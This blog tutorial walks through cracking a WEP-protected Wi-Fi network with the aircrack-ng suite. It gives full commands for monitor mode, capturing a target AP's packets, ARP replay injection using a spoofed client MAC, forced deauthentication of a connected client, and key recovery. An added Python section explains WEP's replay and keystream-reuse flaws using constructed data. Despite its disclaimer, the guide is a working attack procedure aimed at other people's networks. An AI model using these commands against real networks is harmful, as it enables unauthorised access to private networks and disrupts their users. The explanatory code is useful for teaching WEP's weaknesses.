Cracking WEP in 4 steps

Disclaimer: This is just to show how insecure WEP is. This guide is not meant to teach how to crack. Use at your own discretion. I am not to be held responsible for any harm done.

Prerequisites:

BackTrack 3 (it ships the aircrack-ng suite used below: airmon-ng, airodump-ng, aireplay-ng and aircrack-ng)

A wireless card whose driver supports monitor mode and packet injection

10 minutes of your time.


Step 1: Set the wireless card into monitor mode

>airmon-ng start ath0

“airmon-ng” is the program itself.

“ath0” The name of my wireless interface (check yours with iwconfig). airmon-ng prints the name of the monitor-mode interface it set up; use that name in every command that follows, because some drivers create a new interface for monitor mode instead of switching the existing one.


Step 2: Find the network whose key you want and start capturing its packets.

Run “airodump-ng ath0” first to list the nearby networks with their BSSID, channel and connected clients, then restart it locked to the target’s channel:

Command = “airodump-ng -w capture -c 6 ath0”

“airodump-ng” is the program itself.

“-w capture” Gets it to write the sniffed packets to a file called “capture-01.cap” (airodump-ng appends -01, -02, … so a later run does not overwrite an earlier capture).

“-c 6” Makes the program ONLY sniff on channel 6, the target AP’s channel here, so it stops hopping and misses none of that AP’s frames.

“ath0” The name of my monitor-mode interface.

Leave this running in its own terminal for the rest of the procedure. The “#Data” column for the AP is the number of data frames captured; for WEP that is the count of unique IVs aircrack-ng will have to work with.


Step 3: Generate some traffic on your own to save time.

Cracking needs a large number of data frames with distinct IVs. WEP has no replay protection, so a captured ARP request can be re-injected over and over: the AP answers every copy, encrypts each reply under a fresh IV, and airodump-ng collects them far faster than waiting for normal traffic.

Command = “aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA ath0”

“aireplay-ng” Name of the program.

“--arpreplay” Is the function of aireplay you are trying to perform, in this case capturing an ARP request and replaying it to the AP, so the AP keeps generating new encrypted packets (each carrying a fresh IV) for airodump-ng to capture.

“-b 00:11:22:33:44:55” MAC address (BSSID) of the target AP.

“-h 66:77:88:99:00:AA” Source MAC address placed in the injected packets. Here it is the MAC of a machine already connected to that AP, so the AP treats the replays as coming from that client. If no client is connected, associate your own card first with fake authentication (“aireplay-ng -1 0 -a 00:11:22:33:44:55 -h <your MAC> ath0”) and use your own MAC here.

“ath0” Name of my monitor-mode interface.

Leave it running; its “ARP requests” counter climbs once one has been captured. If it stays at zero, the client is probably idle. Kicking the client off the network forces it to reconnect, and a reconnecting machine almost always sends an ARP request, which is what the next command is for:

Command = “aireplay-ng -e Linksys -a 00:11:22:33:44:55 -c 66:77:88:99:00:AA --deauth 10 ath0”

“aireplay-ng” is the program itself

“-e Linksys” is the SSID of the target AP.

“-a 00:11:22:33:44:55” is the MAC address of the target AP.

“-c 66:77:88:99:00:AA” is the MAC address of the target machine connected to that AP (airodump-ng lists the connected stations under each AP in its lower table).

“--deauth 10” The type of attack we’re performing, in this case sending deauthentication frames to that client, repeated 10 times.

“ath0” The name of my monitor-mode interface.

The deauth command is an optional step: only use it if the ARP replay is not picking anything up.


Step 4: Crack the key from the accumulated packets.

Command = “aircrack-ng capture-01.cap”

“aircrack-ng” is the program itself.

“capture” is the name of the file we wrote packets into. “-01” is added automatically to the filename and “.cap” is the extension.

Once you hit enter, you are presented with a numbered list of the networks found in the capture. Select the number of your AP, hit enter and wait for the attack to finish. aircrack-ng does not decrypt anything; it recovers the key statistically from the captured IVs, so it needs enough of them, typically tens of thousands of data frames (fewer for a 40-bit key than for a 104-bit one). If it reports that there are not enough IVs, leave airodump-ng and aireplay-ng running and run it again later; it works on the capture file while the capture is still being written. When it succeeds it prints “KEY FOUND!” followed by the key in hex.
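What the four steps above exploit, shown as an added illustration that is not part of the original post: a small Python model of WEP framing (RC4 keyed with IV || root key, a CRC-32 ICV, and no replay counter). The key, IV and frame bodies are constructed for the example, and the RC4 and ICV byte order are textbook rather than bit-for-bit 802.11. It demonstrates why aireplay-ng can replay a captured ARP request at will, and why a frame with a predictable body (an ARP request) gives away the keystream for its IV, so that any other frame sent under the same IV decrypts without the key.

```python
import struct
import zlib
from collections import Counter


def rc4(key: bytes, length: int) -> bytes:
    """Textbook RC4 (KSA then PRGA); returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(root_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP encapsulation: IV || RC4(IV || root_key)(payload || CRC-32 ICV).
    The 3-byte IV travels in the clear; that is what airodump-ng counts."""
    assert len(iv) == 3
    icv = struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)
    keystream = rc4(iv + root_key, len(payload) + 4)
    return iv + xor(payload + icv, keystream)


def wep_decrypt(root_key: bytes, frame: bytes):
    """Return the payload if the ICV verifies, else None.
    As in real WEP there is no sequence number or replay counter, so a
    re-injected copy of an old frame is indistinguishable from a new one."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + root_key, len(body)))
    payload, icv = plain[:-4], plain[-4:]
    if struct.unpack("<I", icv)[0] != (zlib.crc32(payload) & 0xFFFFFFFF):
        return None
    return payload


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: ciphertext XOR plaintext = keystream for this IV."""
    return xor(frame[3:3 + len(known_plaintext)], known_plaintext)


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt (a prefix of) a frame without the key, given its IV's keystream."""
    return xor(frame[3:3 + len(keystream)], keystream)


def reused_ivs(frames) -> dict:
    """Map each IV that appears more than once to the number of frames using it."""
    counts = Counter(f[:3] for f in frames)
    return {iv: n for iv, n in counts.items() if n > 1}


# --- Constructed sample data (not captured from any real network) ---
ROOT_KEY = bytes.fromhex("0102030405")          # toy 40-bit WEP key
IV = bytes.fromhex("0a0b0c")                    # one IV, deliberately reused below

# An ARP request is almost entirely predictable: LLC/SNAP header
# AA AA 03 00 00 00 08 06 followed by a fixed ARP header. Only the
# addresses vary, and those are visible in the 802.11 header anyway.
ARP_REQUEST = (
    bytes.fromhex("aaaa030000000806")                              # LLC/SNAP, EtherType ARP
    + bytes.fromhex("0001080006040001")                            # Ethernet/IPv4, hlen 6, plen 4, request
    + bytes.fromhex("001122334455") + bytes.fromhex("c0a80164")    # sender MAC / IP
    + bytes.fromhex("000000000000") + bytes.fromhex("c0a80101")    # target MAC / IP
)
# A second, "secret" frame sent under the same IV (LLC/SNAP for IPv4 + some text).
SECRET_FRAME_PAYLOAD = bytes.fromhex("aaaa030000000800") + b"GET /admin HTTP/1.0\r\n"


def demo() -> dict:
    """Run the two properties the aireplay-ng and aircrack-ng steps depend on."""
    arp_frame = wep_encrypt(ROOT_KEY, IV, ARP_REQUEST)
    secret_frame = wep_encrypt(ROOT_KEY, IV, SECRET_FRAME_PAYLOAD)

    # 1. Replay: the very same bytes are accepted again (no freshness check);
    #    a real AP answers each copy with a new frame carrying a new IV.
    replay_accepted = wep_decrypt(ROOT_KEY, arp_frame) == ARP_REQUEST

    # 2. Keystream reuse: the predictable ARP body yields this IV's keystream,
    #    which decrypts any other frame sent under the same IV, key unknown.
    keystream = recover_keystream(arp_frame, ARP_REQUEST)
    leaked = decrypt_with_keystream(secret_frame, keystream)

    return {
        "replay_accepted": replay_accepted,
        "leaked_prefix": leaked,            # secret payload followed by its ICV
        "iv_reuse": reused_ivs([arp_frame, secret_frame]),
    }
```

Call demo() to see both results. The 24-bit IV means a busy network repeats IVs within hours, so the keystream-reuse half of this is a practical problem by itself; the statistical key recovery that aircrack-ng actually performs (FMS, KoreK and PTW attacks on the way RC4 is keyed with IV || key) is a separate weakness and is not modelled here.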

 


Author: MtaraM

Solution designer with Firstsource solutions. An MBA grad in Networks and IT Infrastructure. Technology enthusiast, blogger, webdesigner, Network security aspirant and in love with electronics and gadgets a Household Hacker and Audiophile who loves to share thoughts about almost anything @Mtaram on Twitter
